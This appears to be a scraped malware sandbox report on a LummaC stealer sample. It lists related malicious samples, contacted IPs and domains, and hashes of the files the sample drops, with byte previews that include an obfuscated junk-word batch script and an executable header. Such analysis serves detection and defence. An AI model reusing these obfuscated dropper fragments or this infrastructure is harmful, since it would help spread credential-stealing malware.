                                                                                                                      Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • ordrr.statementquo.com/QCbxA/
                                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                      • adsfirm.com/administrator/index.php
                                                                                                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.bser101pp.buzz/v89f/
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      sputnik-1985.comFeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.80.1
                                                                                                                      [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      steamcommunity.comdavies.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      AKAMAI-ASUSdavies.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      CLOUDFLARENETUSAP_FTT_GENERAL FUND_Email_AmityRegionaltNo5 - 1009684_315100_N.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.18.41.124
                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.80.1
                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 172.67.72.210
                                                                                                                      IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1davies.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 104.21.64.1
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\AppData\Local\Temp\19152\Appliance.comDodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                            CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                        c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):947288
                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: DodSussex.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: DangerousMidlands.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PortugalForum_nopump.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: CondosGold_nopump.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PortugalForum_nopump.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: ModelsPreservation.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: SensorExpo.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):461250
                                                                                                                                          Entropy (8bit):7.999621902028459
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:12288:8/0RpVmgKFUKPpmGpAzs9Qd+alBXfORFrCbKYvA:88FmgKpMMKXfQrCdY
                                                                                                                                          MD5:3D6D45218DAC95051441B7E09E8621B3
                                                                                                                                          SHA1:C6A507255B1C846187BCC734699C7B1555924FE6
                                                                                                                                          SHA-256:6A82008253E0CEB27673AD23527848E51F58ABB6E11666CC5CCA8A454E9DD244
                                                                                                                                          SHA-512:FBC7FA801FF84ADA49E72B342821706FC145BB2208741E264F29B1CD7172AD2B6215FE8A655FB02004483484CC0E5B57C8D4698943450EEBCCFD62756582A2FF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...t..X...0y...O,q.@...^7dD...*.-....1..iqP%..p..W..7DA...Pl_W.#.]K.......%t.]..]..(.....l..,..S.......m..Q..x..N8j.b......G.G3.D#.k...{....'...G.'...-..<..W..tU...R..T.)...}.GS..S?Q=.......|...!...c7.........E..%!.VR.V...IU..>6[&....H..9......j...5.J.h.EGW..bb.Qi..e...R .:..A).....g.8Rjl..K!...a.K.;(.;............:..K..67....6xA@..Yh.DoL......@T. .x..2@..K...Ic...sj..y2..Rom.........v..}..._d..(.}...O6A.we+..o....UZ.".......x.....m..,.v.R.............,a.v...+!h..t....l...?6@...B....{.2~w...8..0..X.AoX./".5a....O.......3i.>..NDl`..{.q.K.oH.U......(.G\...r...t..M...wa.d...8...?.IMC..q.{..+..W!...1q.c......&..+..tuo-...................q.K..p..7...BX.<...2.Q..1u~...]#.6..,.xN.....<.F....y.H.>...w._.}!.x.hn_v.h....8-.._;.g{1MY;5...q.....{3d..(.]HO.Y...KBeP....#@3m.+7I.$.t..(.>....b....&{.=.\a.@.~..2...4...P.[......d;q/..*m...h.U..9...3.Ks..a.+.J..mBIg,U....u......".....e0ZeA;..T;.H:.u.'q.0..?...(..RK...v..'.^Z.R"....1..N.r.Rp.FJ7...x....Q...kK
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):36290
                                                                                                                                          Entropy (8bit):7.995068265567553
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:bjEXfdJyqM23wKsAKSHsJCGkpqGI8cSTPfjQjnBvHeTBcSLX:MXfRp3qMWCDpqGI8cSTjcn5H6
                                                                                                                                          MD5:E1FEDE06FFA7694324BCF0012BAE9FE5
                                                                                                                                          SHA1:CBB60A4DF15D7CF7E15096B7532C060A97D894E8
                                                                                                                                          SHA-256:A1F87ACFE34EC54BC86497054BB85CBB35DAFBF9499BD39B46396DD5C7D8F47D
                                                                                                                                          SHA-512:101B8D400854EBED2622ED4C01D8AB9E3278720860B8907367FC3716D9B853DAD9F209435015E15B0F770776A167B2DF704B3163F8D0E31D73B61871F9889B3A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:hi6.ll......i.....eR..8X%j.3..AK\..utB......:.kWVCG...~....Me..'.T.T.[.~.\.|.@J.A..r.n(_<)..9G..\...,..5`....z.n.....1CM.M.E'.X..$.....$gX1Gj+5...."X.~.mj..|........m.c`)...f....Z....JM..i9H...O..r..O....+V .k2..>.P....=1..m.Zl.W..c.....%.z...]gq._...+....E.$],$..C]{N..y.a.R_..7..u...X.tC.....! .9.1_t...p~.z`>../X3.{.....#....E(...0|...Y....gn+.\...),..#..o..C.........2h..>J]...i..J....P7'..#fr'S.YCy.o...0l....U....k.0K........i....O<.R....W.....U...%!..Kh.)>....!....+........?.....p..YB...XR.3C...Q.........Ii".H;.....3...2.qJ...z..y...?.....2..oXg.[.}...[V(.G...}....^.....,.{f....^.....F...-..c?..l.z..4.2FD......uW^.?..!&lL*.t.f.....?..Y...VB]..YI..Tm.........Y{.Bc'.lz...xY.q..%>c...c.N...../{.:.....X..|..xPt..k..{B....7....ON=.9~.w./.E.'gyD.#$......+,.939{.W...T...:..fV..'..h.2.p..r..^.tvZ~T...h.o|.|..k......Z.~2...<.u....tP..V....w..x8....+x'.....+...9..J.e..0..T....C].8.N5.......'....w..D.-.......um..BW.(.5U.k^eb.j.a....h.,.....:V\.4..V.
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):67584
                                                                                                                                          Entropy (8bit):6.528420431394248
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:H1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzg:HZg5PXPeiR6MKkjGWoUlJU8
                                                                                                                                          MD5:F7BE54E80D09910E992F0918DB991BB7
                                                                                                                                          SHA1:28EFD6516884DFCEC50BFCBFF371596F80BBD756
                                                                                                                                          SHA-256:849A886E92E8E3C8D73E2FAA569F7023C01A40E41C808D80BC8938A4F0CECE76
                                                                                                                                          SHA-512:B743C0AA129D7D9F606F823DD632E0AE0A8EFFA746704839E1ED410EDC343569E158FA076E6F2AC997C6B185A12044B480A02CD9F032EA95A9571FB02F16CD97
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u.
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):92160
                                                                                                                                          Entropy (8bit):7.998077512036191
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:AhYI5MIRnfKSoZpTKTCbudVhi4aLhLldH6POBK8fyizA7LGrN9C1xm:A1MIxf5oZpTfbaGNLhLf6POtyizA7LGt
                                                                                                                                          MD5:973162049DDEB33CD2BA3E2E476F64B0
                                                                                                                                          SHA1:1DEAC83AB1224975F1E8572B8CBC5B21384B6044
                                                                                                                                          SHA-256:B2AC8FBE5D7CB9FAB2E3202FE9A0649DEC91C7112DF587565FAC27FBCB18A25E
                                                                                                                                          SHA-512:4FE741421804BA73E3C49DFD8449C49AAD6C0E398E320D6749B869CBF91D297C59139C0EC3977860B8A4A3BB8419166406C63704A81BB7347683BC9057522696
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:qD'S....W..y@I.+k$m...s......m#9......_...Q.V..P...iI...Q..1)#.1..U....qtO.!&;.\$..Q.6sJ=8J..af..!..3..k......$.+#b.Gl..o...~.m!.a..l.Qz_E.:.32..rt.).[...0n.;..u..v..~.....-.0.wM..q.2w....9.%..+....B..)..!O..'4.....a...7R..~-..L...i...b...u,b[..e. f 0;.-LE.u.%..>..I#.....PM...m.hu.,.(.HX!....Kf.,a..fV.&....#\V..YN.K]....W.^[.....s.zM.a.....&.H.I...37h.xb.W.2 .........>....kb.....G....$.?!.Ff..R)...un/E.4V..d..A+....Q......$v=C.qR..`......8..s.X....d.......U..-Iy%.F.A....>.......v..].J.../".'].X..w'q.a..|...O..Q.v.9[.\s..5.t..b....}?^..1en..w.....+....2..8c...BR....mh1 @d.QY.0cTD.8.}..0.....g..r......+..E..!.-......{Qb0y........"...PBPB....EM..K.8....vE.>....*....gUb..=........[.....<...A..=...&......7<8i1S.~....g.n"dHS.p.1.PW.g].f.GC...S....\..\..\.".Z.."...v.yH...}._..x.Bj....H#~;..:r_.I..M.z.#.k....Y....H....P$..]5.._!...4.*#...Q.....d..?.:..C..Wq..x... .....(....Ah.....a'L3..gt..>.^o.C...:..c..~<.Z..$..8....:...6... ^.m.......:.....
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):88064
                                                                                                                                          Entropy (8bit):7.998142475205919
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:89x7v70Zw3HYIaPI1zOnt3OZJODhNby6p9oeJCljf1SKpDrCD3IRGlGUU56iSQFF:8/7zoI/8YJO1p9oeJmgKpDrk3VlG/kbC
                                                                                                                                          MD5:7674CBBCB2ACA7B63551861BF75F97D0
                                                                                                                                          SHA1:81ED4DA3280BF1ABC4D8E3EB9BEF10938C64D9C2
                                                                                                                                          SHA-256:E2CF3658C672C28D3A8D27F6EFEB40A497202B1C4F7AA5851D6471DBA5E2083F
                                                                                                                                          SHA-512:479CC5E44828C868BB38BC31588894AE08DF8D934DDC4AE4CFDB8E93AE864DAED74FEFA4845F644762BDC0C1E4533F3D90B5E8602D25467CDE1B40B431F53123
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...t..X...0y...O,q.@...^7dD...*.-....1..iqP%..p..W..7DA...Pl_W.#.]K.......%t.]..]..(.....l..,..S.......m..Q..x..N8j.b......G.G3.D#.k...{....'...G.'...-..<..W..tU...R..T.)...}.GS..S?Q=.......|...!...c7.........E..%!.VR.V...IU..>6[&....H..9......j...5.J.h.EGW..bb.Qi..e...R .:..A).....g.8Rjl..K!...a.K.;(.;............:..K..67....6xA@..Yh.DoL......@T. .x..2@..K...Ic...sj..y2..Rom.........v..}..._d..(.}...O6A.we+..o....UZ.".......x.....m..,.v.R.............,a.v...+!h..t....l...?6@...B....{.2~w...8..0..X.AoX./".5a....O.......3i.>..NDl`..{.q.K.oH.U......(.G\...r...t..M...wa.d...8...?.IMC..q.{..+..W!...1q.c......&..+..tuo-...................q.K..p..7...BX.<...2.Q..1u~...]#.6..,.xN.....<.F....y.H.>...w._.}!.x.hn_v.h....8-.._;.g{1MY;5...q.....{3d..(.]HO.Y...KBeP....#@3m.+7I.$.t..(.>....b....&{.=.\a.@.~..2...4...P.[......d;q/..*m...h.U..9...3.Ks..a.+.J..mBIg,U....u......".....e0ZeA;..T;.H:.u.'q.0..?...(..RK...v..'.^Z.R"....1..N.r.Rp.FJ7...x....Q...kK
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):145408
                                                                                                                                          Entropy (8bit):6.628315928999892
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:h0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtv:h0nEo3tb2j6AUkB0CThp6vmVnjpv
                                                                                                                                          MD5:F7ED04C8FEBD990111B46FA11BDD8D1D
                                                                                                                                          SHA1:15D2525CEC051B85CD31F337DBE50DC4AEB8E7AB
                                                                                                                                          SHA-256:06DCA7DC1D2C82224A78FED7F59FBE4FE94776FE98FDB9D44CC66E9F4F1C2EBD
                                                                                                                                          SHA-512:15445C9E187B5B75A8A8B6256EB79571667AE4F3810A122381203E474F33A53DFC16327687F452AFDEE88E2213476F4DCF262C4A32168685F8EF761BFBFE550D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..NY..t...,.....y.3.5|.I.Wh.?F..u...$.....9.....u:.......t1........$..................;.t.P....Wh.?F..u..........t.P..........M..U~...M..M~.._^..[....U..E.V..Vh.?F..u..........$......... ...........|.I.........t.P...z.......2.^]...U..M.].....U......<...SV..W3.................h.....D$<P.u.....I..D$8P.....Y..L$...t!.Y...x...D\8P..'..KY..t.G..y.L$...(...;.........,...;.......+...;.......Q.D$<P........'...............$....D$8..$...P..$H...h lL.P............$T...P...........W................]..N.Sh.....0|...D$...ti.L$.Qh....j.Ph.....v.S..X.I..\$...t<9|$.v6h.....D$<PS.N..|........3.f..$<....D$<P....YY..u.3.GS.N.. |........3.C...tkh......$D...P.u.....I...$@...P.L$,..q.........D$(;.t.P.^}.........A..A..A...L$(..|.........$Z....t.G......C.. t..u.....I.9......7................D$.P.u.....I..D$..D$..D$..D$..D$.P.u.....I.P..x.I.........@t.......;D$.u.GC..y.......;D$.u.GC......t..D$ +D$.9.....u.GC......t..D$$+D$.9.....u.GC...t7h......$D...P.u.....I...$@...P...........YY..u.G......C...t
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):102400
                                                                                                                                          Entropy (8bit):6.4059896910898395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:JfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTk:JfhnvO5bLezWWt/Dd314V14ZgP0h
                                                                                                                                          MD5:304420C62ED1D9CD3F85D86582FCAC5C
                                                                                                                                          SHA1:BC0693627B10C59A1A35ABBAAC45F7286D5FB821
                                                                                                                                          SHA-256:E0ECA4D4BB96BBF101554D6C9A124607604727C3D80784CA51F17CF0DC7B79AE
                                                                                                                                          SHA-512:0C811009FA23F4E9EB9F9C8FFA81CBA3CA03ABB65D069242534C8CC29B427A3D2B72FF241FD8A41DC22ADA94BB547CD10952D49F317DF2AD55D85A4285BD9CCC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M......C....td....RtQ...t3...t ...t..M..E.P....'.u..M...D...2.M..E.P.......M..E.P.AD...u..M..:.....u..M...J...E.P.M.......]..{..u...j..W:...u.M...8...E..P.E.PS......M....%C...M..%l...K.u.M..8...E...P.E.P.E.P.E.P.u..S...
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):29027
                                                                                                                                          Entropy (8bit):5.070122764281543
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:TJN2fuMMPCstNHSrg3lVKCTzR9zCKx4BTOnuCtN5u0tmIy4E0yqK4arJKkN6OjLt:TD2zMbyEVQO9z3S6uImqvTnEKpOjLt
                                                                                                                                          MD5:1772A08E66C81359D95F1B6BE25C7BC6
                                                                                                                                          SHA1:3EC3D8D9C7AF1CB6E89D92B81761E2518844FC79
                                                                                                                                          SHA-256:1D3C3C2A3643173A621BFFE1AD7DEB6752ACF927159807CFD1C823773C133A25
                                                                                                                                          SHA-512:09B91369A720D9B5DF2F89619D29113CD12900E9057B53FA34369E43162BE4B4EF6308BD2E5B9BAB25E0666960EFA90B1C7300FF91A56CB09D07BD28D12DF06E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Set Queries=D..sRAdventure-Gasoline-Freedom-..hETTrading-Kinda-Sunglasses-Tablets-..sSYCreates-Banners-Acc-Soft-Rule-..BCWMars-Proxy-Broadband-Gamecube-Belts-Cove-Wing-Discussions-..owMuze-Review-Ace-Experienced-Daisy-Magic-Under-Origin-Glossary-..KdThImplement-Demonstrates-Sunset-Songs-Treasurer-Evidence-Printed-Exploring-..PuOIBall-Mentioned-Settle-Hypothesis-..mjIndustry-Dutch-Zus-Obvious-Equivalent-Lasting-Particular-Young-..mRzCHot-..Set Preserve=o..tlYSherman-Chance-Mariah-Hunting-Walls-Instrument-Spell-Fragrances-Aging-..rKWelfare-Magazine-Advertisements-Just-Researcher-Designs-Km-Collective-Qc-..MYfkForms-Mesh-..yAGovt-Occasion-Hans-Enclosure-Hollow-..ZTElections-Hacker-Changed-Mar-Rc-Poll-..Set Receptors=v..AgyAmendments-Discounted-Donate-Ltd-Tubes-Calm-Fool-Compatible-..MJPens-Front-..ElJOTrend-Stephanie-Machine-Serbia-..bbNewscom-Chuck-..bSMassive-..oOWMixing-..PAWord-..NQGzip-Simon-..LWpIsrael-Funeral-Irish-Pokemon-Constantly-Much-Am-..Set Holiday=0..HXpHighlights-Looks-Bar
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):29027
                                                                                                                                          Entropy (8bit):5.070122764281543
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:TJN2fuMMPCstNHSrg3lVKCTzR9zCKx4BTOnuCtN5u0tmIy4E0yqK4arJKkN6OjLt:TD2zMbyEVQO9z3S6uImqvTnEKpOjLt
                                                                                                                                          MD5:1772A08E66C81359D95F1B6BE25C7BC6
                                                                                                                                          SHA1:3EC3D8D9C7AF1CB6E89D92B81761E2518844FC79
                                                                                                                                          SHA-256:1D3C3C2A3643173A621BFFE1AD7DEB6752ACF927159807CFD1C823773C133A25
                                                                                                                                          SHA-512:09B91369A720D9B5DF2F89619D29113CD12900E9057B53FA34369E43162BE4B4EF6308BD2E5B9BAB25E0666960EFA90B1C7300FF91A56CB09D07BD28D12DF06E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Set Queries=D..sRAdventure-Gasoline-Freedom-..hETTrading-Kinda-Sunglasses-Tablets-..sSYCreates-Banners-Acc-Soft-Rule-..BCWMars-Proxy-Broadband-Gamecube-Belts-Cove-Wing-Discussions-..owMuze-Review-Ace-Experienced-Daisy-Magic-Under-Origin-Glossary-..KdThImplement-Demonstrates-Sunset-Songs-Treasurer-Evidence-Printed-Exploring-..PuOIBall-Mentioned-Settle-Hypothesis-..mjIndustry-Dutch-Zus-Obvious-Equivalent-Lasting-Particular-Young-..mRzCHot-..Set Preserve=o..tlYSherman-Chance-Mariah-Hunting-Walls-Instrument-Spell-Fragrances-Aging-..rKWelfare-Magazine-Advertisements-Just-Researcher-Designs-Km-Collective-Qc-..MYfkForms-Mesh-..yAGovt-Occasion-Hans-Enclosure-Hollow-..ZTElections-Hacker-Changed-Mar-Rc-Poll-..Set Receptors=v..AgyAmendments-Discounted-Donate-Ltd-Tubes-Calm-Fool-Compatible-..MJPens-Front-..ElJOTrend-Stephanie-Machine-Serbia-..bbNewscom-Chuck-..bSMassive-..oOWMixing-..PAWord-..NQGzip-Simon-..LWpIsrael-Funeral-Irish-Pokemon-Constantly-Much-Am-..Set Holiday=0..HXpHighlights-Looks-Bar
                                                                                                                                          Process:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):74752
                                                                                                                                          Entropy (8bit):7.997927415486124
                                                                                                                                          Encrypted:true
